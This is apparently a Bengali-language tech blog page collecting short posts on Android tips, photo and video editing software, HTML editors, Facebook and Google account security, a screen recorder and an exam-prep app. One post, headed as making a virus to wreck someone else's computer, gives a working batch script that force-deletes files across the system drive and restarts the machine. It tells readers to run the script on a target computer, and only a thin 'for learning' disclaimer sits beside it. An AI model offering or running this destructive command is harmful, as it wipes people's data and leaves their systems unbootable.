এখন ফ্রি ইন্টারনেট চালান বন্ধুর মোবাইল দিয়ে ।

আস সালামুআলাইকুম । কেমন আছে সবাই , আশা করি ভাল । ঈদ কেমন গেল আশা করি সবার খুব ভাল গেছে ,আমারও ভাল গেছে । শত ব্যাস্ততার মাঝে আপনাদের সাথে হাজির হলাম দারুন একটি টিপ্স । অবশ্যই আপনাদের ভাল লাগবে । বুঝতেই পারছেন যে পোষ্ট  টি কি সম্পর্কে ।  এটা একটা সাধারন টিপ্স । আমরা শুধু এটাকে একটু অন্য পথে ব্যাবহার করব ।



এখন আমি আপনাদের সাথে এই  বিষয় টি আলোচনা করব , কিভাবে বন্ধুর মোবাইল থেকে ফ্রি নেট চালাবেন । যেহেতু এই টিপ্স টা  অ্যান্ড্রয়েড ফোনের জন্য তিাই আপনার অবশ্যই একটা অ্যান্ড্রয়েড ফোন থাকা চাই ।

কিভাবে ফ্রি নেট চালাবেন আপনাদের বুঝার সুবির্ধাথে এই বাংলা ভিডিও টিউটিটিরয়াল টি দিলাম । ভিডিও টিউটিরিয়াল টি মনযোগ দিয়ে দেখুন । এই ভিডিও এর মাধ্যমে আপনি আপনার ইন্টারনেট অন্য ডিবাইস বা একাধিক ডিবাইসে শেয়ার করতে পারবেন।


ভিডিও টি ভাল লাগলে Like , comment  এবং Subscribe  করতে বুলবেন না । প্রযুক্তি বিয়য়ে আর ভিডিও পেতে অবশ্যই subscribe  করুন ।






DSLR Camera নেই তও কি হয়েছে অ্যান্ড্রয়েড ফোন তও আছে । দেখে নিন না দেখলে মিস করবেন ।

আস সালামুআলাইকুম ,কেমন আছেন সবাই ,আশা করি ভাল আছেন ,সবাইকে ঈদের শুভেচ্ছা জানিয়ে শুরু করছি আজকের পোষ্ট । অনেক ব্যাস্ততার  ফাকে আজ আপনাদের জন্য নিয়ে এলাম অসাধারন একটি পোষ্ট । অপনাদের কাছে অবশ্যই ভাল লাগবে ।


আমাদের সবার DSLR Camera নেই কিন্তু সবার DSLR Camera  দিয়ে ফটো তুলার শখ আছে ,যাদের শখ আছে কিন্তু DSLR Camera   নেই বিষেশ করে এই পোষ্ট টি তাদের জন্য ।

আজ আমি আপনাদের সাথে এমন একটি অ্যান্ড্রয়েড সফটওয়্যার শেয়ার করব যেটা দিয়ে আপনি DSLR Camera   মত ফটো এডিট করতে পারবেন। কিভাবে ফটো এডিক করবেন সেটার জন্য ভিডিও টিউটিরিয়াল টি দেখবেন ।

সফটওয়্যার  টি ডাইনলোড করুন এখান  থেকে । আপনারা আপনাদের ইচ্ছা মত প্লে ষ্টোর অথবা মিডিয়া ফায়ার থেকে ডাউনলোড করতে পারবেন ।



 প্রথমে সফটওয়্যার টি ডাউনলোড করে নিন । তার পর ভিডিও টিউটিরিয়াল টি মনযোগ দিয়ে দেখুন ,কিভাবে ফটো এডিট করবেন ।



ধন্যবাদ সবাইকে ঈদের শুভেচ্ছা


ভিডিও ইডিট করতে চান, তাহলে নিয়ে নিন ভিডিও এডিটিং এর সেরা সফটওয়্যার ।

আস সালামুআলাইকুম । কেমন আছেন আছেন সবাই ? আসা করি ভাল আছেন । আপনারা ভাল থাকবেন এটাই আমার চাওয়া । সামনে আমার টেষ্ট পরীক্ষা তাই ব্লগে সময় দেওয়া হয় না , তার পরও চেষ্টা করব আপনাদের সাথে কিছু শেয়ার করার ।


অনেক সময় আমাদের শখ হয় ভিডিও ইডিট করার কিন্তু ভাল সফটওয়্যার এবং ভিডিও এডিট না জানার কারণে আমাদের হতাশ হতে হয়। তাই আজ কে আমি আপনাদের সাথে যে বিষয় আলোচনা করব সেটা হল কিভাবে ভিডিও এডিটিং করতে হয়। আর এ জন্য আপনার ভাল একটি সফটওয়্যার প্রয়োজন । আমি আপনাদের জন্য হাজির হয়েছি সেরা সফটওয়্যার টি নিয়ে ।

সফটওয়্যার টির নাম হল wondershare Filmora


  • সফটওয়্যার টির কিছু উল্লেখযোগ্য ফিচার:
  • নিজের ইচ্ছে মত ভিডিও তৈরী করা যায় ।
  • যে কোনো ফরমেটে save করা যায় ।
  • সরাসরি ফেইসবুক ,ইউটুভে ভিডিও আপলোড করা যায় ।
  •  ইফেক্টস,ফিল্টার,ইলিমেন্ট ইত্যাদির সমাহার ।
  • ফ্রি text ফন্ট এবং মিউজিক ।


এখন সফটওয়্যারটি ডাউনলোড করুন আর হয়ে যান ভিডিও ইডিটর ।

কিভাবে সফটওয়্যার টি ব্যাবহার করবেন তার জন্য এই বাংলা ভিডিও টিউটিরিয়ালর টি দেখুন ।

ভিডিওটি ভাল লাগলে subscribe  করতে ভুলবেন না ।





সেরা দশ থেকে বেচে নিন আপনার টি । HTML ইডিট এর জন্য সেরা সফটওয়্যার ।

আস-সালামু আলাইকুম। কেমন আছেন সবাই, আশা করি ভালো। আপনাদের সুস্ততা আমার কাম্য । আজ কয়েক দিন পর আপনাদের সামনে হাজির হলাম নতুন একটি পোষ্ট নিয়ে । আশা করি ভাল লাগবে ।


adobe dreamweaver,Numan Ahmad,html,



আমরা যারা নতুন HTML শিখতে চাই তারা সব সময় দিধায় পরে যান যে কোন  সফটওয়্যার দিয়ে শিখবেন । তাদের জন্য অনেক ঘাটা ঘাটি করে Best সফটওয়্যার টা নিয়ে এলাম । এখানে সেরা দশ সফটওয়্যার থেকে আপনি আপনার টা বেচে নিতে পারবেন ।

                         বর্তমান সময়ের সেরা দশে থাকা সফটওয়্যার গুলো ।

বর্তমানে তালিকায় শীর্ষে থাকা ১০ টি HTML EDITOR  সফটওয়্যার । আপনি আপনার টা বেচে নিন । এখান থেকে আপনারা সেরা ৫ টি  সফটওয়্যার এর অপিসিয়াল সাইট থেকে দেখে আসতে পারেন ।







উপরের লিস্টটি থেকে তালিকায় প্রথমে থাকা Adobe Dreamweaver   সফটওয়্যারটি হলো সবার সেরা। তো ডাউনলোড শুরু করার আগে  সফটওয়্যারটির ফিচার সম্পর্কে একটু জেন যাক ।


                                            Adobe Dreamweaver 
Adobe Dreamweaver সর্ম্পকে ভাল ভাবে জানতে অফিসিয়াল সাইট ভিজিট করুন ।

Adobe Dreamweaver এর উল্লেখযোগ্য কিছু ফিচার :-

  • খুব সহজে HTML এডিট করা ।
  • অটো tag এর সুবিধা ।
  • অনলাইনে সরাসরি previwe দেখা ।
  • তিন ভাবে (coad,split,desin) কাজ করা যায় ।

এক্সপার্ট দেরর জন্য আরো অনেক সুবিধা আছে ।

  সফটওয়্যার টি যদি আপনার মনে ধরে তাহলে আপনি মাত্র ৫৯ মেগা বাইট খরচ করে এটি ডাউনলোড করতে  পারেন ।
                                       

এখান থেকে ডাউনলোড করে ইনস্টল করুন । এখন আপনার কাজ শেষ ,শুধু উপভোগ করুন । আর পেষ্ট টি বুঝতে কোনো অসুবিধা হলে টিউমেন্ট করবেন । কোনো পরামর্শ যদি দিতে চান তাহলেও টিউমেন্ট করুন অথবা আমাকে ফেউসবুকে মেসেজ দিতে পারেন ।





এবার আপনার ফেইসবুক একাউন্ট হ্যাক করার জন্য চ্যালেঞ্জ জানান যে কাউকে ।

بِسْمِ اللَّهِ الرَّحْمَٰنِ الرَّحِيمِ
আস সালামুআলাইকুম । কেমন আছেন আছেন সবাই ? আসা করি ভাল আছেন । আপনারা ভাল থাকবেন এটাই আমার চাওয়া । সামনে আমার টেষ্ট পরীক্ষা তাই ব্লগে সময় দেওয়া হয় না , তার পরও চেষ্টা করব আপনাদের সাথে কিছু শেয়ার করার । আজ আমি আপনাদের সাথে যে বিষয় টা আলোচনা করব সেটা হল আপনি চাইলেই আপনার একাউন্ট হ্যাক করার জন্য যে কাউকে চ্যালেঞ্জ করতে পারেন । কি থমকে গেছেন ?


আপনাকে এভাবে চ্যালেঞ্জ করতে হলে প্রথমে আপনাকে আপনার একাউন্ট এর security তে কিছু পরিবর্তন করতে হবে । মানে আপনাকে আপনার একাউন্টের  security বৃদ্ধি করতে হবে । চলুন দেখি আমরা কিভাবে আমাদের একাউন্টের  security  কে শক্তিশালী করব ।


  •   আপনার ফেইসবুকের পাসওয়ার্ড কমপক্ষে ১২ ডিজিট বা তার উপরে দিন । 
  •  পাসওয়ার্ডে   “/*#=+”>< ইত্যাদি চিহ্ন রাখলে পাসওয়ার্ড আরো শক্তিশালী হয় । যা ডিস্কনারী এটাক প্রতিরোধ করতে সক্ষম ।
  •  ফেইসবুকে মোবাইল নাম্বারের পরিবর্তে  ইমেইল আইডি ব্যাবহার করুন ।
  • ইমেইল আইডিতে 2 step verification চালু করুন ।
  • ফেইসবুকে মোবাইল verification  চালু করুন । 
  • ফেইসবুক security Question এড করুন ।
  • ফেইসবুকে কোনো ধরনের Apps install করবেন না । করলে রিমুব করে দিন ।
  • এবার  setting এর security  অপসন থেকে Text Message Login Notifications Enable করুন।>Email Login Notifications Enable করুন। >Login Approvals On Enable করুন।>Active Sessions সব Active Season সিলেক্ট করে Remove করুন।
  • ফেইসবুক ব্যাতিত অন্য কোনো সাইটে ফেইসবুক আইডি দিয়ে Login  করবেন না । কারন ওগুলো ফিসিং সাইট ।
  • সাইবারক্যাফে বা অন্য কার কম্পিউটারে আপনার আইডি Login করবেন না ।
  •  ব্রাউজারে পাসওয়ার্ড save  করে রাখবেন না ।
                            এখন আপনি একাউন্ট হ্যাক করার জন্য বাজি দরতে পারেন । 
                            কোনো সমস্যা হলে আমাকে ফেইসবুকে ইনবক্স করতে পারেন ।
            


            



এবার ভাইরাস তৈরী করুন আপনি নিজেই । আর অন্যের কম্পিউটারের ১২ টা বাজিয়ে দিন ।

আস সালামুআলাইকুম ,কেমন আছেন আছেন সবাই আশা করি ভাল । আপনারা ভাল থাকেন আমি এটা সব সময় কামনা করি । পোষ্টের শিরোনাম দেখেই বুঝতে পারছেন পোষ্ট টি কোন বিষয়ে ।কে চায় তার নিজের কম্পিউটার ধ্বংস করতে কিন্তু এটা জেনে রাখা খারাপ কিছু না । হয়ত কোনো সময় আপনার কম্পিউটার ধ্বংসের হাত থেকে বাচতে পারবে । তবে এটা কেউ খারাপ উদ্দেশ্যে ব্যাবহার করবেন না । শুধু শিখার জন্য আর নিজে সতর্ক হবার জন্য জেনে রাখবেন ।


এখন আপনাকে এই কাজ টি করার জন্য যা করতে হবে ।

১. প্রথমে নিচের কোড টি copy  করে নোট প্যাডে past করুন ।

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

২.  ফাইলটি .bat ফর্মেটে যে কোন নামে save  করুন। তবে save Type টা all files সিলেক্ট রাখবেন।



৩. save করার পর নিচের মত একটা .bat ফাইল তৈরী হবে ।

৪.এবার যে কম্পিউটার টার ১২ টা বাজাতে চান সেই কম্পিউটারে এই ফাইল টা রান করান । দেখুন .bat এর কারসাযী ।

৫. ভুলেও যদি কাজ করে কি না ট্রাই করে দেখতে চান তাহলে আপনার গুরুত্বর্পূন ফাইল গুলো অন্য পিসিতে কপি করে রাখুন , না হলে মাথায় হাত দেওয়া ছাড়া কোনো উপায় থাকবেনা ।

৬. যখন .bat ফাইলটির তাণ্ডব শেষ হবে তখন My Com puter গিয়ে দেখন C Drive ব্যতীত অন্য Drive ঊদাও। ওহ C Drive Capacity দেখুন একটু কত আছে। সাথে সাথে দেখুন আপনার পিসি কত স্লো হয়েছে।

৭. এখন  পিসি Restart করে দেখুন  পিসিতে Boot failor দেখা দিচ্ছে , তার মানে ১০০ %  নতুন করে Windows Reinstall করতে হবে।

৮.নষ্ট হওয়া ফাইল ফেরাতে চাইলে কোনো ডাটা রিকভারি সফটওয়্যার ব্যাবহার করতে পারেন ।

আমার ইউটুভ চ্যানেল সময় হলে একবার ঘুরে আসবেন ।



আপনার google account কে করুন আর শক্তিশালী ,কেউ পাসওয়ার্ড জানলেও log in করতে পারবে না ।

আস সালামুআলাইকুম কেমন আছেন সবাই আশা করি ভাল । আপনারা সবাই সব সময় ভাল থাকবেন এটাই আমার চাওয়া । শতব্যাস্ততার মাঝেও আপনাদের সাথে ছোট একটা জিনিস শেয়ার করার চেষ্টা করব ।


 আপনাদের সাথে আমি যে বিষয় টা শেয়ার করব সেটা হল আপনি কিভাবে আপনার গুগল একাউন্ট কে আর শক্তি শালী করবেন । মানে কেউ যদি আপনার গুগল আইডি হ্যাক ও করে ফেলে তার পরেও সে আপনার একাউন্টে … করতে পারবেন না ।

আর এই কাজ টা আমরা করব 2 step verification  এর মাধ্যমে । 2 step verification  বলতে এটা গুগলের একটা সার্বিস । এটার মাধ্যমে আপনি আপনার ফোন নাম্বার দিয়ে আপনার আইডি ভেরিফাই করবেন এবং কেউ যখন আপনার পাসওর্য়াড দিয়ে log in করার চেষ্টা করবে তখন আপনার নাম্বারে একটা কোড আসবে এই কোড ছাড়া কেউ log in করতে পারবেনা । 

এবার মূল কথায় আসা যাক , প্রথমে আপনি গুগল সার্চে যান এবং র্সাচ করুন 2 step verification ‍এবং google 2 step verification এ  প্রবেশ করুন  । এখন কিছু নির্দেশনা সেগুলো পরুন lets start এ ক্লিক করুন ।এবং  এখন একটি নাম্বার চাইবে আপনি আপনার নাম্বার দিন এবং নির্দেশনা মত এগিয়ে যান । এবার বেরিফাই আপসনে ক্লিক করুন । আপনার কাজ শেষ আপনার একাউন্ট ভেরিফাই হয়ে গেছে । এখন আপনার একাউন্ট সুরক্ষিত । 

প্রয়োজনে ভিডিও টিউটিরিয়াল টি দেখুন ।

ভিডিওটি ভাল লাগলে subscribe  করতে ভুলবেন না ।


নিয়ে নিন Non Root অ্যান্ড্রয়েড ফোনের স্ক্রিন রেকর্ড করার জন্য দারুন একটি সফটওয়্যার । ১০০% কার্য কারী ।

আস সালামুআলাইকুম । কেমন আছেন সবাই , আশা করি ভাল আছেন । আপনারা সবাই ভাল থাকেন এটাই অমার কাম্য ।
যেহেতু আমি দাখিল পরীক্ষার্থী তাই পড়া লেখার ফাকে আপনাদের সাথে সব সময় সব কিছু শেয়ার করা হয় না ।

আজ আমি আপনাদের সাথে যে বিষয় টি শেয়ার করব সেটি হল কিভাবে অ্যান্ড্রয়েড ফোনের স্ক্রিন রেকর্ড করতে হয় ।
 এই বিষয়ে আর অনেক  পোষ্ট  আছে কিন্তু এর অনেকটি ফেইক আবার বেশির ভাগ পোষ্টওই রুট করা ফোনের জন্য ।

 অনেক ঘাটা ঘাটি করে  নন রুট ফোনের স্ক্রিন রেকর্ড করার  জন্য নিয়ে এলাম দারূন একটি অ্যান্ড্রয়েড Apps।

Apps টির নাম হচ্ছে Mobizen
এটা আপনারা ply store  থেকে ডাউনলোড করতে পারবেন ।


এবার Appsটি ডাউনলোড করে নিন , এবং Apps টি অপেন করুন , এখন Apps এর নির্দেশনা গুলো ভাল করে পরুন । এখন আপনার ইমেল আইডি চাইবে ,আপনি আপনার আসল ইমেল আইডি দিন এবং আপনার ইচ্ছা মত একটি পাসওর্য়াড দিন ।, bass এবার sing up করুন ।

এখন আপনি Apps এর ড্যাসর্বোড দেখতে পাবেন সেখান থেকে নির্দেশনা মত কাজ করুন ।সেখানে আপনি Record screen নামে একটি অপসন পাবেন সেখানে ক্লিক করুন । তার পর ডিস্পেলের মধ্যে  আপনি Appsএর আইকন দেখতে পাবেন,সেখানে ক্লিক করে আপনি Record  শুরু করতে পারবেন ।


 যারা বুঝেন নি চিন্তা করবেন না আপনাদের জন্য ভিডিও টিউটিরিয়াল তও আছে । ভিডিও টিউটিরিয়ালে …. এর সর্ম্পূন র্কায প্রনালী দেখানো হয়েছে ।


 যদি ভিডিওটি ভাল লাগে তাহলে Like এবং Subscribe করতে ভুলবেন না । 

     
                                             ”ধন্যবাদ”







আপনি কি ssc বা দাখিল পরীক্ষার্থী ? তাহলে পরীক্ষার প্রস্তুতি হওক ছোট অ্যান্ড্রয়েড App এর সাথে ।

আস সালামুআলাইকুম । কেমন আছেন সবাই ? আশা করি ভাল আছেন । আল্লাহ যেন আপনাদেরকে সব সময় ভাল রাখেন এই আশাই করি ।






বর্তমানে যারা  ssc বা দাখিল পরীক্ষার্থী আছেন  আজ আমি তাদের জন্য শেয়ার করব ছোট একটি অ্যান্ড্রয়েড App যার মাধ্যমে আপনি ssc এবং দাখিল পরীক্ষার প্রস্তুতি নিতে পারবেন । যাচাই করতে  পারবেন আপনার দক্ষতা । তাছাড়া এই আপনার জন্য রয়েছে পরীক্ষার পরিপূর্ন গাইডলাইন ।
এই App  টির নাম হচ্ছে ssc prep   ।   ডাউনলোড লিংক পোষ্টের  নিচে দেওয়া আছে ।

প্রথমে App  টি ডাউনলোড করে নিন । তার পর App টি অপেন করুন , অবশ্যই ইন্টারনেট সংযোগ থাকতে হবে ।
তার পর আপনি এখানে তিনটি অপসন দেখতে পাবেন । সেখান থেকে আপনি আপনার পছন্দের  অপসন টি বেচে নিন  ।
আপনার কাজ শেষ এবার ইচ্ছা মত পরীক্ষার প্রস্তুতি নিন । 


আগামী পোষ্টে দেখা হবে ইনশা অাল্লাহ
                 “ ধন্যবাদ”





Kategori

Kategori